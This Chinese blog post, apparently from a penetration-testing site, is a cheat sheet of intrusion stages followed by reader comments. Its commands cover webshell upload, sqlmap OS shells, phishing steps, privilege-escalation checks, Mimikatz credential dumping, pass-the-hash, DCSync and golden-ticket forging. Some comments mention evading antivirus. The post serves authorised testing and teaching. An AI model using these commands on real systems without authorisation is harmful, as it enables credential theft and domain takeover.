权限提升实战:Windows 与 Linux 提权技巧

爪 爪
爪 爪
爪 爪
编辑
59
文章
0
粉丝
渗透测试361,229字数 473阅读1分34秒阅读模式
AI智能摘要
AI 生成的文章内容摘要

一、渗透测试流程概览

信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写
权限提升实战:Windows 与 Linux 提权技巧

---

二、信息收集阶段

2.1 外网信息收集

# 子域名枚举
subfinder -d target.com -o subs.txt
# 端口扫描 nmap -sS -sV -p- target.com
 
# 目录扫描 dirsearch -u http://target.com -e php,html,js
 
# 指纹识别 whatweb http://target.com

2.2 社工库查询

- 邮箱泄露查询:haveibeenpwned.com
- 密码泄露查询:dehashed.com
- 企业邮箱格式:theHarvester

---

三、初始访问

3.1 Web 漏洞利用

# 文件上传漏洞
# 上传 webshell 到 /uploads/shell.php
# SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell
 
# RCE 漏洞 # Struts2、WebLogic、Fastjson 等

3.2 钓鱼攻击

1. 伪造登录页面
2. 发送钓鱼邮件
3. 获取员工凭证
4. VPN 登录内网

---

四、权限提升

4.1 Windows 提权

# 检查系统信息
systeminfo
whoami /priv
# 检查补丁 wmic qfe list
 
# 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula

4.2 linux 提权

# 检查内核版本
uname -a
# 检查 sudo 权限 sudo -l
 
# 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null
 
# 检查 cron 任务 cat /etc/crontab

---

五、横向移动

5.1 凭证窃取

# Mimikatz 抓取密码
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
# 导出 hash mimikatz # lsadump::sam

5.2 传递攻击

# PtH(传递 hash)
mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH
# PtT(传递票据) mimikatz # kerberos::ptt admin.ccache

---

六、域控拿下

6.1 域信息收集

# 查看域信息
net domain
nltest /domain_trusts
# 查看域控 nltest /dclist:target.com
 
# 查看域用户 net user /domain

6.2 黄金票据

# 获取 krbtgt hash
mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt
# 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx

---

七、报告编写

7.1 报告结构

1. 执行摘要
2. 漏洞列表(按风险等级)
3. 详细利用过程
4. 修复建议
5. 附录(工具、命令)

---
作者:爪
分类:渗透测试
标签:内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间:2026-04-28

热门话题

linux SUID提权还有哪些隐藏技巧?

 
爪 爪
  • 本文由 爪 爪 发表于2026年4月29日 10:19:06
评论  36  访客  36
    • 深海鲸
      深海鲸 1

      这权限提升细节太硬核了,我直接看懵了。

      • 猎风者
        猎风者 0

        感觉文章结构贼清晰,步步都跟得上。

          • 炎烬
            炎烬 1

            @ 猎风者 确实,得这种清单式的才好查。

          • 茶商朱
            茶商朱 0

            linux那几条命令我试了报错,咋回事啊?

            • 秘境行
              秘境行 0

              这玩意儿真能拿到域控权限?细思极恐。

              • 船夫江生
                船夫江生 1

                作者列的工具必须靠谱,效率真高,666。

                  • 夜阑灯烬
                    夜阑灯烬 1

                    @ 船夫江生 现在杀软更新快,很多得自己魔改才能用。

                  • 烤冷面热心摊主
                    烤冷面热心摊主 0

                    外网信息收集这块我踩过坑,懂了懂了。

                      • 背囊里的诗
                        背囊里的诗 1

                        @ 烤冷面热心摊主 好奇踩了啥坑,是子域名没跑全吗?

                      • 小透明
                        小透明 1

                        Windows提权步骤写得明明白白,佩服。

                        • 网络猎手
                          网络猎手 1

                          随便吐槽下,这报告模板可以复用。

                          • 嘟嘟奶熊
                            嘟嘟奶熊 1

                            横向移动的凭证窃取听着就危险,捂脸。

                            • 陨石诗人
                              陨石诗人 1

                              新手小白路过,很多概念完全看不懂。

                                • 废土幽灵
                                  废土幽灵 2

                                  @ 陨石诗人 多看几遍,建议先去搜搜基础命令。

                                • 银河浮标
                                  银河浮标 1

                                  accesschk在最新的Win11上还能跑通吗?

                                  • Nimbus_光晕
                                    Nimbus_光晕 1

                                    这Mimikatz也太猛了,感觉没法防御😂

                                    • 小兔崽子
                                      小兔崽子 1

                                      感觉列的工具太常规了,现在很多都被杀软秒了。

                                      • 白泽游
                                        白泽游 1

                                        以前碰到个服务器sudo权限配置极烂,直接一键root。

                                        • 铜烛台
                                          铜烛台 1

                                          有点意思。

                                          • 影之殇
                                            影之殇 1

                                            那Kerberoasting这块怎么搞?没看到写。

                                              • 蚩尤戈
                                                蚩尤戈 1

                                                @ 影之殇 得先搞定SPN,然后离线爆破,这块儿水深,建议搜搜专门的教程。

                                              • 影锋
                                                影锋 1

                                                最烦写报告了,技术活儿快,写文档能磨我一天,还得想怎么把漏洞描述得像那么回事,不然客户总觉得没干活。

                                                  • 郭靖
                                                    郭靖 1

                                                    @ 影锋 太真实了,我每次写报告都想直接把截图甩给客户,懒得写文字。

                                                  • 木灵清风
                                                    木灵清风 0

                                                    那个subfinder怎么安装?我看文档没写清楚。

                                                    • 一屁崩出个未来
                                                      一屁崩出个未来 1

                                                      围观一下,感觉这行门槛挺高。

                                                      • 墨池深处
                                                        墨池深处 1

                                                        每次跑nmap都要跑半天,真的心累。

                                                        • 沉睡的冰川
                                                          沉睡的冰川 1

                                                          确实,内网渗透最关键的就是权限提升。

                                                          • 梨园传奇
                                                            梨园传奇 1

                                                            之前在个项目里用mimikatz被抓了,现在得用更隐蔽的手段。

                                                            • 合金之心
                                                              合金之心 1

                                                              要是目标环境是全隔离的内网,这些工具怎么传进去?

                                                              • 赤焰将
                                                                赤焰将 0

                                                                写得这么简单,真以为随便敲几个命令就能拿域控?

                                                                • 醉舞红尘
                                                                  醉舞红尘 1

                                                                  还行,能参考。

                                                                  • NinjaNerd
                                                                    NinjaNerd 1

                                                                    太猛了,赶紧试试!

                                                                    • 书页间的墨香
                                                                      书页间的墨香 1

                                                                      命令都是基础款,有没有新一点的玩法?

                                                                      • 胖胖龙
                                                                        胖胖龙 1

                                                                        我之前在公司做内网审计,发现很多服务器的sudo权限真的离谱,直接给了个全权限,完全不需要什么技巧就进去了,现在的运维意识真的得加强。

                                                                        • 金角大王
                                                                          金角大王 1

                                                                          Mimikatz那段看着有点慌,实操风险不小啊

                                                                        匿名

                                                                        发表评论

                                                                        匿名网友

                                                                        拖动滑块以完成验证